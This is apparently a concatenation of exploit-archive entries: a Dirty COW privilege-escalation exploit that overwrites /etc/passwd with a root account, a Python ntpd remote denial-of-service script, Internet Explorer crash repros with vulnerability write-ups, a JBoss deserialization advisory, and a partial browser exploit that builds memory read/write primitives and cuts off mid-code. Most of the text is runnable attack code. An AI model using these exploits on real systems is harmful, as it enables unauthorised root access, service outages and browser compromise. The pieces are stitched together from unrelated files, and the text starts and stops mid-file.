", argv[1], argv[2]) ;// dirty cow
f=open(argv[1],O_RDONLY) ;// open read only file
fstat(f,&st) ;// stat the fd
map=mmap(NULL ,// mmap the file
st.st_size+sizeof(long) ,// size is filesize plus padding
PROT_READ ,// read-only
MAP_PRIVATE ,// private mapping for cow
f ,// file descriptor
0) ;// zero
printf("mmap %lx\n\n",(unsigned long)map);// sum of error code
pid=fork() ;// fork process
if(pid) {// if parent
waitpid(pid,NULL,0) ;// wait for child
int u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length)
for(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l
for(o=0;o<l;o++)//////////////////////// repeat for each byte
for(u=0;u<10000;u++)////////////////// try 10K times each time
c+=ptrace(PTRACE_POKETEXT ,// inject into memory
pid ,// process id
map+o ,// address
*((long*)(argv[2]+o))) ;// value
printf("ptrace %d\n\n",c) ;// sum of error code
}// otherwise
else {// child
pthread_create(&pth ,// create new thread
NULL ,// null
madviseThread ,// run madviseThred
NULL) ;// null
ptrace(PTRACE_TRACEME) ;// stat ptrace on child
kill(getpid(),SIGSTOP) ;// signal parent
pthread_join(pth,NULL) ;// wait for thread
}// / child
return 0 ;// return
}// / entrypoint
//////////////////////////////////////////////
//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
// The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>
const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";
int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;
struct Userinfo {
char *username;
char *hash;
int user_id;
int group_id;
char *info;
char *home_dir;
char *shell;
};
char *generate_password_hash(char *plaintext_pw) {
return crypt(plaintext_pw, salt);
}
char *generate_passwd_line(struct Userinfo u) {
const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
int size = snprintf(NULL, 0, format, u.username, u.hash,
u.user_id, u.group_id, u.info, u.home_dir, u.shell);
char *ret = malloc(size + 1);
sprintf(ret, format, u.username, u.hash, u.user_id,
u.group_id, u.info, u.home_dir, u.shell);
return ret;
}
void *madviseThread(void *arg) {
int i, c = 0;
for(i = 0; i < 200000000; i++) {
c += madvise(map, 100, MADV_DONTNEED);
}
printf("madvise %d\n\n", c);
}
int copy_file(const char *from, const char *to) {
// check if target file already exists
if(access(to, F_OK) != -1) {
printf("File %s already exists! Please delete it and run again\n",
to);
return -1;
}
char ch;
FILE *source, *target;
source = fopen(from, "r");
if(source == NULL) {
return -1;
}
target = fopen(to, "w");
if(target == NULL) {
fclose(source);
return -1;
}
while((ch = fgetc(source)) != EOF) {
fputc(ch, target);
}
printf("%s successfully backed up to %s\n",
from, to);
fclose(source);
fclose(target);
return 0;
}
int main(int argc, char *argv[])
{
// backup file
int ret = copy_file(filename, backup_filename);
if (ret != 0) {
exit(ret);
}
struct Userinfo user;
// set values, change as needed
user.username = "firefart";
user.user_id = 0;
user.group_id = 0;
user.info = "pwned";
user.home_dir = "/root";
user.shell = "/bin/bash";
char *plaintext_pw;
if (argc >= 2) {
plaintext_pw = argv[1];
printf("Please enter the new password: %s\n", plaintext_pw);
} else {
plaintext_pw = getpass("Please enter the new password: ");
}
user.hash = generate_password_hash(plaintext_pw);
char *complete_passwd_line = generate_passwd_line(user);
printf("Complete line:\n%s\n", complete_passwd_line);
f = open(filename, O_RDONLY);
fstat(f, &st);
map = mmap(NULL,
st.st_size + sizeof(long),
PROT_READ,
MAP_PRIVATE,
f,
0);
printf("mmap: %lx\n",(unsigned long)map);
pid = fork();
if(pid) {
waitpid(pid, NULL, 0);
int u, i, o, c = 0;
int l=strlen(complete_passwd_line);
for(i = 0; i < 10000/l; i++) {
for(o = 0; o < l; o++) {
for(u = 0; u < 10000; u++) {
c += ptrace(PTRACE_POKETEXT,
pid,
map + o,
*((long*)(complete_passwd_line + o)));
}
}
}
printf("ptrace %d\n",c);
}
else {
pthread_create(&pth,
NULL,
madviseThread,
NULL);
ptrace(PTRACE_TRACEME);
kill(getpid(), SIGSTOP);
pthread_join(pth,NULL);
}
printf("Done! Check %s to see if the new user was created.\n", filename);
printf("You can log in with the username '%s' and the password '%s'.\n\n",
user.username, plaintext_pw);
printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
backup_filename, filename);
return 0;
}
#!/usr/bin/env python
# Exploit Title: ntpd 4.2.8p3 remote DoS
# Date: 2015-10-21
# Bug Discovery: John D "Doug" Birdwell
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: http://support.ntp.org/bin/view/Main/NtpBug2922
# Vendor Homepage: http://www.ntp.org/
# Software Link: https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p3.tar.gz
# Version: All ntp-4 releases up to, but not including 4.2.8p4, and 4.3.0 up to, but not including 4.3.77
# CVE: CVE-2015-7855
import sys
import socket
if len(sys.argv) != 3:
print "usage: " + sys.argv[0] + " <host> <port>"
sys.exit(-1)
payload = "\x16\x0a\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa0\x6e\x6f\x6e\x63\x65\x3d\x64\x61\x33\x64\x35\x64\x30\x66\x66\x38\x30\x38\x31\x65\x63\x38\x33\x35\x32\x61\x32\x32\x38\x36\x2c\x20\x66\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39\x39"
print "[-] Sending payload to " + sys.argv[1] + ":" + sys.argv[2] + " ..."
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], int(sys.argv[2])))
print "[+] Done!"
<!--
Source: http://blog.skylined.nl/20161122001.html
Synopsis
A specially crafted web-page can cause Microsoft Internet Explorer 8 to attempt to read data beyond the boundaries of a memory allocation. The issue does not appear to be easily exploitable.
Known affected software, attack vectors and mitigations
Microsoft Internet Explorer 8
An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
Repro.html:
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<style>
position_fixed { position: fixed; }
position_relative { position: relative; }
float_left { float: left; }
complex { float: left; width: 100%; }
complex:first-line { clear: left; }
</style>
<script>
window.onload = function boom() {
oElement_float_left = document.createElement('float_left');
oElement_complex = document.createElement('complex');
oElement_position_fixed = document.createElement('position_fixed');
oElement_position_relative = document.createElement('position_relative');
oElement_table = document.createElement('table');
oElement_x = document.createElement('x');
oTextNode = document.createTextNode('x');
document.documentElement.appendChild(oElement_float_left);
oElement_float_left.appendChild(oElement_complex);
oElement_float_left.appendChild(oTextNode);
oElement_complex.appendChild(oElement_position_fixed);
oElement_complex.appendChild(oElement_position_relative);
oElement_complex.appendChild(oElement_table);
oElement_complex.appendChild(oElement_x);
setTimeout(function() {
oElement_x.setAttribute('class', 'x');
setTimeout(function() {
alert();
document.write(0);
}, 0);
}, 0);
}
</script>
</head>
</html>
<!--
Description
The issue requires rather complex manipulation of the DOM and results in reading a value immediately following an object. The lower three bits of this value are returned by the function doing the reading, resulting in a return value in the range 0-7. After exhaustively skipping over the read AV and having that function return each value, no other side effects were noticed. For that reason I assume this issue is hard if not impossible to exploit and did not investigate further. It is still possible that there may be subtle effects that I did not notice that allow exploitation in some form or other.
Time-line
June 2014: This vulnerability was found through fuzzing.
October 2014: This vulnerability was submitted to ZDI.
October 2014: This vulnerability was rejected by ZDI.
November 2014: This vulnerability was reported to MSRC.
February 2015: This vulnerability was addressed by Microsoft in MS15-009.
November 2016: Details of this issue are released.
-->
Security Advisory @ Mediaservice.net Srl
(#05, 23/11/2016) Data Security Division
Title: Red Hat JBoss EAP deserialization of untrusted data
Application: JBoss EAP 5.2.X and prior versions
Description: The application server deserializes untrusted data via the
JMX Invoker Servlet. This can lead to a DoS via resource
exhaustion and potentially remote code execution.
Author: Federico Dotta <federico.dotta@mediaservice.net>
Maurizio Agazzini <inode@mediaservice.net>
Vendor Status: Will not fix
CVE Candidate: The Common Vulnerabilities and Exposures project has assigned
the name CVE-2016-7065 to this issue.
References: http://lab.mediaservice.net/advisory/2016-05-jboss.txt
http://lab.mediaservice.net/code/jboss_payload.zip
https://bugzilla.redhat.com/show_bug.cgi?id=1382534
1. Abstract.
JBoss EAP's JMX Invoker Servlet is exposed by default on port 8080/TCP. The
communication employs serialized Java objects, encapsulated in HTTP
requests and responses.
The server deserializes these objects without checking the object type. This
behavior can be exploited to cause a denial of service and potentially
execute arbitrary code.
The objects that can cause the DoS are based on known disclosed payloads
taken from:
- https://gist.github.com/coekie/a27cc406fc9f3dc7a70d
Currently there is no known chain that allows code execution on JBoss EAP,
however new chains are discovered every day.
2. Example Attack Session.
Submit an authenticated POST request to the JMX Invoker Servlet URL (for
example: http://localhost:8080/invoker/JMXInvokerServlet) with one of the
following objects in the body of the request:
* 01_BigString_limited.ser: it's a string object; the server will
reply in a normal way (object size similar to the next one).
* 02_SerialDOS_limited.ser: the application server will require
about 2 minutes to execute the request with 100% CPU usage.
* 03_BigString.ser: it's a string object; the server will
reply in a normal way (object size similar to the next one).
* 04_SerialDOS.ser: the application server will require an
unknown amount of time to execute the request with 100% CPU usage.
3. Affected Platforms.
This vulnerability affects versions 4 and 5 of JBoss EAP.
4. Fix.
Red Hat will not fix the issue because JBoss EAP 4 is out of maintenance
support and JBoss EAP 5 is close to the end of its maintenance period.
5. Proof Of Concept.
See jboss_payload.zip (40842.zip) and Example Attack Session above.
http://lab.mediaservice.net/code/jboss_payload.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40842.zip
6. Timeline
06/10/2016 - First communication sent to Red Hat Security Response Team
07/10/2016 - Red Hat Security Response Team response, Bug 1382534
23/11/2016 - Security Advisory released
Copyright (c) 2016 @ Mediaservice.net Srl. All rights reserved.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40842.zip
<!--
Source: http://blog.skylined.nl/20161124001.html
Synopsis
A specially crafted web-page can cause a type confusion in HTML layout in Microsoft Internet Explorer 11. An attacker might be able to exploit this issue to execute arbitrary code.
Known affected software and attack vectors
Microsoft Internet Explorer 11
An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
Repro.html:
-->
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<script>
window.onload = function () {
document.getElementsByTagName("iframe")[0].src = "repro-iframe.html";
}
</script>
</head>
<body>
<iframe></iframe>
</body>
</html>
<!--
Repro-iframe.html:
<svg><path marker-start="url(#)"><title><q><button>
Description
Internally MSIE uses various lists of linked CTreePos objects to represent the DOM tree. For HTML/SVG elements a CTreeNode element is created, which embeds two CTreePos instances: one that contains information about the first child of the element and one that indicates the next sibling or parent of the element. For text nodes an object containing only one CTreePos is created, as such nodes never have any children. CTreePos instances have various flags set. This includes a flag that indicates if they are the first (fTPBegin) or second (fTPEnd) CTreePos instance for an element, or the only instance for a test node (fTPText).
The CTreePos::Branch method of an CTreePos instance embedded in a CTreeNode can be used to calculate a pointer to the CTreeNode. It determines if the CTreePos instance is the first or second in the CTreeNode by looking at the fTPBegin flag and subtract the offset of this CTreePos object in a CTreeNode object to calculate the address of the later. This method assumes that the CTreePos instance is part of a CTreeNode and not a TextNode. It will yield invalid results when called on the later. In a TextNode, the CTreePos does not have the fTPBegin flag set, so the code assumes this is the second CTreePos instance in a CTreeNode object and subtracts 0x24 from its address to calculate the address of the CTreeNode. Since the CTreePos instance is the first element in a TextNode, the returned address will be 0x24 bytes before the TextNode, pointing to memory that is not part of the object.
Note that this behavior is very similar to another issue I found around the same time, in that that issues also caused the code to access memory 0x24 bytes before the start of a memory region containing an object. Looking back I believe that both issues may have had the same root cause and were fixed at the same time.
The CGeneratedContent::HasGeneratedSVGMarker method walks the DOM using one of the CTreePos linked lists. It looks for any descendant node of an element that has a CTreePos instance with a specific flag set. If found, the CTreePos::Branch method is called to find the related CTreeNode, without checking if the CTreePos is indeed part of a CTreeNode. If a certain flag is set on this CTreeNode, it returns true. Otherwise it continues scanning. If nothing is found, it returns false.
The repro creates a situation where the CGeneratedContent::HasGeneratedSVGMarker method is called on an SVG path element which has a TextNode instance as a descendant with the right flags set to cause it to call CTreePos::Branch on this TextNode. This leads to type confusion/a bad cast where a pointer that points before a TextNode is used as a pointer to a CTreeNode.
Reversed code
While reversing the relevant parts, I created the following pseudo-code to illustrate the issue:
enum eTreePosFlags {
fTPBegin = 0x01, // if set, this is a markup node
fTPEnd = 0x02, // if set, this is a markup node
fTPText = 0x04, // if set, this is a markup node
fTPPointer = 0x08, // if set, this is not a markup node
fTPTypeMask = 0x0f
fTPLeftChild = 0x10,
fTPLastChild = 0x20, // poNextSiblingOrParent => fTPLastChild ? parent : sibling
fTPData2Pos = 0x40, // valid if fTPPointer is set
fTPDataPos = 0x80,
fTPUnknownFlag100 = 0x100, // if set, this is not a markup node
}
struct CTreePos {
/*offs size*/ // THE BELOW ARE BEST GUESSES BASED ON INADEQUATE INFORMATION!!
/*0000 0004*/ eTreePosType fFlags00;
/*0004 0004*/ UINT uCharsCount04; // Seems to be counting some chars - not sure what exactly
/*0008 0004*/ CTreePos* poFirstChild; // can be NULL if no children exist.
/*000C 0004*/ CTreePos* poNextSiblingOrParent; // fFlags00 & fTPLastChild ? parent end tag : sibling start tag
/*0010 0004*/ CTreePos* poThreadLeft10; // fFlags00 & fTPBegin ? previous sibling or parent : last child or start tag
/*0014 0004*/ CTreePos* poThreadRight14; // fFlags00 & fTPBegin ? first child or end tag :
/*0018 0004*/ flags (0x10 = something with CDATA
/*0028 0004*/
}
struct CTreeNode {
/*offs size*/ // THE BELOW ARE BEST GUESSES BASED ON INADEQUATE INFORMATION!!
/*0000 0004*/ CElement* poElement00;
/*0004 0004*/ CTreeNode* poParent04;
/*0008 0004*/ DWORD dwUnknown08; // flags?
/*000C 0018*/ CTreePos oTreePosBegin0C; // represents the position in the document immediately before the start tag
/*0024 0018*/ CTreePos oTreePosEnd24; // represents the position in the document immediately after the end tag
/*003C ????*/ Unknown
}
struct TextNode { // I did not figure out what this is called in MSIE
/*0000 0018*/ CTreePos oTreePosEnd00; // represents the position in the document immediately after the node.
/*0018 0014*/ Unknown
}
CTreeNode* CTreePos::Branch() {
// Given a pointer to a CTreePos instance in a CTreeNode instance, calculate a pointer to the CTreeNode instance.
// The CTreePos instance must be either the oTreePosBegin0C (oTreePosBegin0C->fFlags00 & fTPBegin != 0) or the
// oTreePosEnd24 (oTreePosEnd24->fFlags00 & fTPEnd != 0).
BOOL bIsTreePosBegin0C = this->fFlags00 & fTPBegin;
INT uOffset = offsetof(CTreeNode, bIsTreePosBegin0C ? oTreePosBegin0C : oTreePosEnd24);
return (CTreeNode*)((BYTE*)this - uOffset);
}
BOOL CGeneratedContent::HasGeneratedSVGMarker() {
for (
CTreePos* poCurrentTreePos = this->oTreePosBegin0C.poThreadRight14,
CTreePos* poEndTreePos = &(this->oTreePosEnd24);
poCurrentTreePos != poEndTreePos;
poCurrentTreePos = poCurrentTreePos->poThreadRight14
) {
if (poCurrentTreePos->fFlags00 & fTPUnknownFlag100) {
// Calling Branch is only valid in the context of CTreePos embedded in a CTreeNode, so the code should check for
// the presence of fTPBegin or fTPEnd in fFlags00 before doing so. This line of code may fix the issue:
// if (poCurrentTreePos->fFlags00 & (fTPBegin | fTPEnd) == 0) continue;
CTreeNode* poTreeNode = poCurrentTreePos->Branch();
if (poTreeNode && poTreeNode->dw64 == 20) {
return 1
}
}
}
return 0
}
DOM Tree
If you replace the <q> tag with an <a> tag in the repro, or insert a <script> tag before the <svg> tag, the repro does not trigger an access violation. At that point it is possible to use document.documentElement.outerHTML as well as recursively walk document.documentElement.childNodes to get an idea of what the DOM tree looks like around the time of the crash.
document.documentElement.outerHTML:
<html>
<head>
</head>
<body>
<svg xmlns="http://www.w3.org/2000/svg">
<path marker-start="url("#")">
<title>
<q>
<button> // no closing tag.
<script> // script is a sibling of button
#text // snipped
</script>
</q>
</title> // Things get really weird here:
</title>
</path> // all svg close tags are doubled!?
</path>
</svg> // Not sure what this means.
</svg>
</body>
</html>
Walking document.documentElement.childNodes:
<html>
<head>
<body>
<svg> // I did not look at attributes
<path> // ^^^ same here
<title>
<q>
<button>
<script> // script is a child of button
#text // snipped
Exploit
I did not find any code path that could lead to exploitation. However, I did not do a thorough step through of the code to find out if and how I might control execution flow upwards in the stack. Also, it appears trivial to have MSIE survive the initial crash by massaging the heap. It might be possible that other methods are affected by a similar issue and that further DOM manipulations can be used to trigger a more interesting code path.
Time-line
July 2014: This vulnerability was found through fuzzing.
September 2014: This vulnerability was submitted to ZDI.
September 2014: This vulnerability appears to have been fixed.
October 2014: This vulnerability was rejected by ZDI.
November 2016: Details of this issue are released.
-->
<!--
Source: http://blog.skylined.nl/20161125001.html
Synopsis
A specially crafted web-page can cause Microsoft Internet Explorer 10 to continue to use an object after freeing the memory used to store the object. An attacker might be able to exploit this issue to execute arbitrary code.
Known affected software and attack vectors
Microsoft Internet Explorer 10
An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
Repro.html:
-->
<!DOCTYPE html>
<html>
<head>
<script>
var oWindow = window.open("window.xhtml");
setInterval(function () {
try {
oWindow.eval("(" + function () {
document.designMode = "on";
document.execCommand("SelectAll");
var oSelection = window.getSelection();
oSelection.collapse(document,1);
document.execCommand("InsertImage", false);
document.designMode="off";
} + ")()");
} catch (e) {}
}, 1);
</script>
</head>
</html>
Window.xhtml
<!-- comment --><html xmlns="http://www.w3.org/1999/xhtml">
</html>
<!--
Description
The last line of script (designMode = "off") will cause some cleanup in MSIE, which appears to trigger use of a stale pointer in CEditAdorner::Detach. I did not investigate further.
Time-line
November 2012: This vulnerability was found through fuzzing.
November 2012: This vulnerability was submitted to EIP.
December 2012: This vulnerability was rejected by EIP.
January 2013: This vulnerability was submitted to ZDI.
March 2013: This vulnerability was acquired by ZDI.
June 2013: This issue was addressed by Microsoft in MS13-047.
November 2016: Details of this issue are released.
-->
Source: http://blog.skylined.nl/20161128001.html
Synopsis
A specially crafted web-page can cause a type confusion vulnerability in Microsoft Internet Explorer 8 through to 11. An attacker can cause code to be executed with a stack layout it does not expect, or have code attempt to execute a method of an object using a vftable, when that object does not have a vftable. Successful exploitation can lead to arbitrary code execution.
Known affected software and attack vectors
Microsoft Internet Explorer 8, 9, 10 and 11
An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.
1 Repro.svg:
<script xmlns="http://www.w3.org/2000/svg">
window.exploit = function(w) {
o={x:w.DOMImplementation(0).prototype.hasFeature};
o.x();
};
open("1 Target.html");
</script>
1 Target.html:
<script>
opener.exploit(window);
</script>
Description
In an SVG page, a copy of the hasFeature method of a DOMImplementation object from a HTML page is created. This copy is used as a method of a new object and called with one argument. This can cause at least two issues in the MSHTML!Method_VARIANTBOOLp_BSTR_o0oVARIANT function of MSIE:
A Failfast exception when the code detects that calling a method of an object has not cleaned up the stack as expected; this is because the called function appears to expect a different number of arguments or a different calling convention. This issue can be triggered by changing the line o.x(); in the repro to o.x(new Array).
An out-of-bounds write when MSHTML!CBase::PrivateGetDispID is called; this is probably caused by a type confusion bug: the code expects a VARIANT object of one type, but is working on an object of a different type.
The repro was tested on x86 systems and does not reproduce this issue on x64 systems. I did not determine if this is because x64 systems are not affected, or because the repro needs to be modified to work on x64 systems.
Exploit
Exploitation was not attempted. I reversed Method_VARIANTBOOLp_BSTR_o0oVARIANT only sufficiently to get an idea of the root cause, but not enough to determine exactly what is going on or how to control the issue for command execution.
2 Repro.html:
<body onload=open("2 Target.html")>
2 Target.html:
<meta http-equiv=X-UA-Compatible content=IE=11><body onload=x=opener.DOMImplementation(0).prototype.isPrototypeOf;x()>
Description
Calling the isPrototypeOf method of the DOMImplementation interface as a function results in type confusion where an object is assumed to implement IUnknown when in fact it does not. The code attempts to call the Release method of IUnknown through the vftable at offset 0, but since the object has no vftables, a member property is stored at this offset, which appears to have a static value 002dc6c0. An attacker that is able to control this value, or allocate memory and store data at that address, may be able to execute arbitrary code.
Exploit
No attempts were made to further reverse the code and determine the exact root cause. A few attempts were made to control the value at offset 0 of the object in question, as well as get another object in its place with a different value at this location, but both efforts were brief and unsuccessful.
Time-line
September 2015: This vulnerability was found through fuzzing.
October 2015: This vulnerability was submitted to ZDI.
November 2015: This vulnerability was acquired by ZDI.
February 2016: This issue was addressed by Microsoft in MS16-009.
November 2016: Details of this issue are released.
<!-- author:@oldfresher -->
<html>
<div id="message" style="color: red;"></div>
<script>
function gc(){
for(var i=0;i<0x200000;i++){
new Array;
}
}
function to_hex(num){
return (num>>>0).toString(16);
}
function log (){
var str = "<h3>";
for(var i=0;i<arguments.length;i++){
str+=arguments[i];
}
str += "</h3>";
console.log(str);
document.write(str);
}
function set_access_address(address){
controllerdv.setUint32(3*4,address,true);
controllerdv.setUint32(4*4,0x40000000,true);
}
function get_dateview(address){
set_access_address(address);
if(this.controlleedv === undefined){
this.controlleedv = new DataView(controlee);
}
return this.controlleedv;
}
function read_uint32(from_address){
return get_dateview(from_address).getUint32(0,true);
}
function write_uint32(to_address,writed_value){
get_dateview(to_address).setUint32(0,writed_value,true);
}
function dumpHex(address){
str = "\n"
for(var i=0;i<20;i++){
str+=read_uint32(address+i*4).toString(16)+" ";
if(i%4==3)str+="\n";
}
log(str);
}
var kMessages;
Object.prototype.__defineGetter__("observe_accept_invalid",function(){
log("called");
kMessages=this});
try{Object.observe({},function(){},1)}catch(e){}
delete Object.prototype["observe_accept_invalid"];
kMessages["strict_read_only_property"].push("%3");
kMessages["object_not_extensible"].push("%3");
var args = null;
Array.prototype.__defineGetter__(3,function(){
log("3 get called");
args=this})
var p = Promise.defer();
Object.freeze(p.promise)
try{p.reject(1)}catch(e){}
var promiseStatusSymbole = args[0];
var flag = true;
Object.prototype.__defineSetter__(promiseStatusSymbole,function(){
log("set status called");
if(flag){Object.freeze(this)}})
try{new Promise(function(){})}catch(e){}
var promiseValueSymbol = args[0];
flag=false;
delete Object.prototype[promiseStatusSymbole];
flag = true;
Object.prototype.__defineSetter__(promiseValueSymbol,function(){
log("set status called");
if(flag){Object.freeze(this)}})
try{new Promise(function(){})}catch(e){}
var promiseOnResolveSymbol = args[0];
flag=false;
delete Object.prototype[promiseValueSymbol];
delete Array.prototype[3];
kMessages["strict_read_only_property"].pop();
kMessages["object_not_extensible"].pop();
var pro = new Promise(function(){});
var onResolve=pro[promiseOnResolveSymbol];
var InternalArray = Object.getPrototypeOf(onResolve)
var innerProto = {__proto__:null}
function toHex(str) {
var hex = '';
for(var i=0;i<str.length;i++) {
var temp = ("0"+ str.charCodeAt(i).toString(16)).substr(-2);
hex += temp;if(i%4==3)hex += ' ';
}
return hex;
}
var overwrite;
/*
0x5a0df8e8: 0x5a0df429 0x9f808531 0x00000003 0x00000020
0x5a0df8f8: 0x61616161 0x61616161 0x61616161 0x9f616161
0x5a0df908: 0x9f80af89 0x9fa08089 0x9fa08089 0x9ff9a000
0x5a0df918: 0x00004000 0x00000000 0x9ed38931 0x9fb08091
0x5a0df928: 0x00000000 0x00000000 0x9f808121 0x00000100
0x5a0df938: 0x000000c2 0x000000c2 0x000000c2 0x000000c2
*/
var ga;
Object.prototype.__defineSetter__.call(innerProto,0, function(val){
log("set 0 called");/*innerArray=this;*/
//set hole
//Object.defineProperty(this,0,{value:val});
}
)
var steps="leaking";
var controller=null;
Object.prototype.__defineGetter__.call(innerProto,0, function(){
if(steps==="leaking"){
this.length=1;
}else{
controller= new ArrayBuffer(0x1000);
disableHook();
steps="leaking";
var abStr = leakArrayBuffer();
log("internal Array length is "+this.length);
var oldLength = this.length;
for(var i=0;i<abStr.length;i++){
this[i+oldLength]=abStr.charCodeAt(i);
}
log(JSON.stringify(this));
}
log("get--- 0 called");
return 0x48;
}
);
function enalbeHook(){
Object.setPrototypeOf(InternalArray,innerProto)
}
function disableHook(){
Object.setPrototypeOf(InternalArray,null);
}
function str2dv(str){
var ab = new ArrayBuffer(str.length);
var dv = new DataView(ab);
for(var i=0;i<str.length;i++){
dv.setUint8(i,str.charCodeAt(i));
}
return dv;
}
function leakArrayBuffer(){
var encoded = "aaaaaaaa";
for(var i=0;i<7;i++)encoded+=encoded;
log("string length is "+encoded.length);
enalbeHook();
var encodedResult = encodeURI(encoded);
disableHook();
//find modified ArrayBuffer
log(toHex(encodedResult));
var pattern = String.fromCharCode(0x80,0x80,0x80,0,0x80,0x80,0x80,0,0x80,0x80,0x80,0);
var index = encodedResult.indexOf(pattern,36);
if(index==-1){
throw "find modified array buffer failed";
}
var str=encodedResult.substr(index-4,4);
controleeAddress=String.fromCharCode(str.charCodeAt(0)-1)+str.substr(1,3);
//find sprayed ArrayBuffer
pattern = String.fromCharCode(0x20,0,0,0,0,0,0,0);
index = encodedResult.indexOf(pattern,36);
log(toHex(encodedResult));
if(index==-1){
throw "find array buffer failed";
}
log("find array bufer at "+index);
var abStr = encodedResult.substr(index-16,12);
abStr += controleeAddress;
controleeAddress=str2dv(controleeAddress).getUint32(0,true);
abStr += String.fromCharCode(0,0,0,2);
log(toHex(abStr));
return abStr;
}
steps="overwrite";
//controller modify controlee
var controlee = new ArrayBuffer(0x10000);
controlee[0]={};//防止map改变
controlee[1]={};//防止map改变
controlee[2]={};//防止map改变
//spray
for(var i=0;i<0x200000/16;i++){new Array}//move controlee to old space
for(var i=0;i<0xc000;i++){
var ab=new ArrayBuffer(0x10);
ab[0]=controlee;
ab[1]=0x404040;
ab[2]=0x404040;
ab[3]=0x404040
};
var encoded2="1111";
enalbeHook();
var encodedResult = encodeURI(encoded2);
disableHook();
log("byte length of controller is "+controller.byteLength+typeof(controller));
if(typeof(controller)!="object"||controller.byteLength!=0x1000000){
alert("modify controller failed");
throw("error");
}
var controllerdv = new DataView(controller);
log("controller memory layout");
for(var i=0;i<10;i++){
log(("00000000"+controllerdv.getUint32(i*4).toString(16)).substr(-8));
}
//生成一块足够大的可读写内存
var huge_str = "eval('');";
for(var i=0;i<8000;i++) huge_str += 'a.a;';
huge_str += "return 10;";
var huge_func = new Function('a',huge_str);
huge_func({});
var text = new Text("");
var normalArrayBufferLength = 0x800000;
controlee[0]=new ArrayBuffer(normalArrayBufferLength);
controlee[1]=huge_func;
controlee[2]=text;
var normalArrayBuffer= controlee[0];
var controleeElementAddress = read_uint32(controleeAddress+8,true)-1;
dumpHex(controleeElementAddress);
var normalArrayBufferAddress = read_uint32(controleeElementAddress+8,true)-1;
var functionAddress = read_uint32(controleeElementAddress+12,true)-1;
var textAddress = read_uint32(controleeElementAddress+16,true)-1;
var normalArrayBufferBackingStore = read_uint32(normalArrayBufferAddress+3*4,true);
var rwxAddress = read_uint32(functionAddress+3*4);
var wrapperTypeInfo=read_uint32(textAddress+3*4);
log("rwxAddress "+to_hex(rwxAddress)+" wrapperTypeInfo "+to_hex(wrapperTypeInfo));
function find(start,len,pattern){
log("find start at "+ to_hex(start));
var dv = get_dateview(start);
for(var i=0;i<len-pattern.length*4;i++){
for(var j=0;j<pattern.length;j++){
if(dv.getUint32(i+j*4,true)!=pattern[j]) break;
}
if(j==pattern.length) return start+i;
}
alert("find failed");
}
//var magic_number=[0xeef6f71e,0xb1104604,0x47a02010];//get_elf_hwcap_from_getauxval,0x447949c3
var magic_number=[0xb1104604,0x47a02010,0x46284604];//get_elf_hwcap_from_getauxval,0x447949c3
var magic_position=find((wrapperTypeInfo&~0xfff)-0x1546000,0x2000000,magic_number);
log("find magic at "+to_hex(magic_position));//78 f6 bc ee
function get_dest_from_blx(addr) {
var val = read_uint32(addr);
var s = (val & 0x400) >> 10;
var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);
var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);
var i10h = val & 0x3ff;
